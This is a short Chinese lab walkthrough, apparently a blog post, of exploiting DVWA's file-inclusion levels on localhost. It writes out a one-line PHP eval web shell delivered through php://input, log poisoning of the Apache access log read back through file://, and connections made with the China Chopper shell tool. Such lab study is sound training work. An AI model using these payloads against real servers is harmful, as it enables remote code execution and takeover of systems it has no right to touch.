LOW、Medium
![](https://upload-images.jianshu.io/upload_images/4664072-270b415b9452b6f7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-03c41dae9a1193e7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-4e7319031ff0d67d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
包含值是page
使用php://进行http://localhost:8083/DVWA-master/vulnerabilities/fi/?page=php://input
![](https://upload-images.jianshu.io/upload_images/4664072-e7e2e53b0d3eeeea.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
进行post写入小马<?phpeval($_REQUEST[666]);?>
![](https://upload-images.jianshu.io/upload_images/4664072-c38a50e9b3a3c97e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
验证http://localhost:8083/DVWA-master/vulnerabilities/fi/?page=php://input&666=phpinfo();
![](https://upload-images.jianshu.io/upload_images/4664072-45280e0c7981cc90.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
菜刀连接http://localhost:8083/DVWA-master/vulnerabilities/fi/?page=php://input 666
![](https://upload-images.jianshu.io/upload_images/4664072-c75aede0c00c8220.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-542b639a048075bc.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
High级别
file://
经过实验值后面只能上传file*,所以利用file://来读取本地的文件
我们可以通过日志文件来进行读取
首先我们先写小马,通过bp,url上写会被转义
![](https://upload-images.jianshu.io/upload_images/4664072-b39f9e51d7fab8b8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
更改内容,写上小马,日志里会有
GET/DVWA-master/vulnerabilities/fi/?page= HTTP/1.1
查看日志文件http://localhost:8083/DVWA-master/vulnerabilities/fi/?page=file://D:xamppapachelogsaccess.log
![](https://upload-images.jianshu.io/upload_images/4664072-995572ec9534430b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
可以看见有666
验证666有没有用http://localhost:8083/DVWA-master/vulnerabilities/fi/?page=file://D:xamppapachelogsaccess.log&666=phpinfo();
![](https://upload-images.jianshu.io/upload_images/4664072-644191b59c08c7be.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
用菜刀连http://localhost:8083/DVWA-master/vulnerabilities/fi/?page=file://D:xamppapachelogsaccess.log 666
![](https://upload-images.jianshu.io/upload_images/4664072-d0289da4b58a0b91.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-86cab81662314c83.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)